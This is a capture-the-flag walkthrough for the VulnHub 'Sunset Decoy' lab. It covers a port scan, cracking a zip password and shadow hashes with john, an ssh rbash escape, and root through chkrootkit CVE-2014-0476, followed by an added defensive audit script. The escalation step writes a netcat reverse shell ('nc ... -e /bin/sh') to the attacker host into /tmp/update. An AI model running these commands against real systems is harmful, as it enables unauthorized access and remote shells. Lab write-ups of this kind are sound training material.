Topics: brute forcing, chkrootkit, rbash bypass
Target machine link: https://www.vulnhub.com/entry/sunset-decoy,505/
Environment setup
Name | IP |
---|---|
Kali Linux | 10.0.2.15 |
SUNSET DECOY | 10.0.2.13 |
Initial foothold
Port scan
```
$ export rip=10.0.2.13
$ sudo nmap -v -A -p- $rip
Scanning localhost (10.0.2.13) [65535 ports]
Discovered open port 80/tcp on 10.0.2.13
Discovered open port 22/tcp on 10.0.2.13
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
| 256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_ 256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip
```
Web testing
Browse to port 80 and download save.zip
```
$ zip2john save.zip >>save.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt save.txt
```
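This recovers the zip archive password: manuel
Extracting the archive yields several files
Vulnerability discovery
Try brute forcing the system passwords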
```
$ unshadow passwd shadow >pass.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
```
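Gaining access
Testing the target
One user's password is recovered successfully
Logging in with it lands in rbash (restricted bash)
Pass a command argument to ssh to get a regular bash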
```
$ ssh 296640a3b825115a47b68fc44501c828@10.0.2.13 -t "bash -noprofile"
```
Privilege escalation
chkrootkit
chkrootkit is present on the box; try the known vulnerability CVE-2014-0476
```
$ cd /tmp
$ echo "/usr/bin/nc 10.0.2.15 444 -e /bin/sh" > update
$ bash update
```
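A defender-side audit for the condition this step relies on, as an added example that is not part of the original write-up: CVE-2014-0476 affects chkrootkit before 0.50, which runs the file /tmp/update as root. The function names are hypothetical, and the banner format `chkrootkit version X.YY` printed by `chkrootkit -V` is an assumption.

```shell
#!/bin/sh
# Added example: host audit for CVE-2014-0476 (chkrootkit < 0.50).
# Function names are hypothetical; the "chkrootkit version X.YY" banner
# format is assumed.

# Return 0 if the banner shows a version below 0.50 (vulnerable),
# 1 if it is 0.50 or later, 2 if no version could be parsed.
chkrootkit_is_vulnerable() {
    ver=$(printf '%s\n' "$1" |
        sed -n 's/.*version \([0-9][0-9]*\.[0-9][0-9]*\).*/\1/p' | head -n 1)
    [ -n "$ver" ] || return 2
    # chkrootkit versions are plain decimals (0.49, 0.50, ...), so a
    # numeric comparison is enough; a suffix such as "0.58b" is ignored.
    awk -v v="$ver" 'BEGIN { exit !(v + 0 < 0.50) }'
}

# Return 0 and print owner/mode details if DIR/update exists.
# On a vulnerable host any such file would be executed as root.
find_update_candidate() {
    f="$1/update"
    [ -e "$f" ] || [ -L "$f" ] || return 1
    ls -ld "$f"
}

# Report both findings for one host; DIR defaults to /tmp.
audit_host() {
    dir=${1:-/tmp}
    if command -v chkrootkit >/dev/null 2>&1; then
        banner=$(chkrootkit -V 2>&1) || true
        if chkrootkit_is_vulnerable "$banner"; then
            echo "VULNERABLE: $banner (upgrade to 0.50 or later)"
        else
            echo "chkrootkit: $banner"
        fi
    else
        echo "chkrootkit not installed"
    fi
    if find_update_candidate "$dir"; then
        echo "REVIEW: $dir/update exists, check its owner and contents"
    fi
    return 0
}

audit_host "${1:-/tmp}"
```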
Last modified: 2020-07-07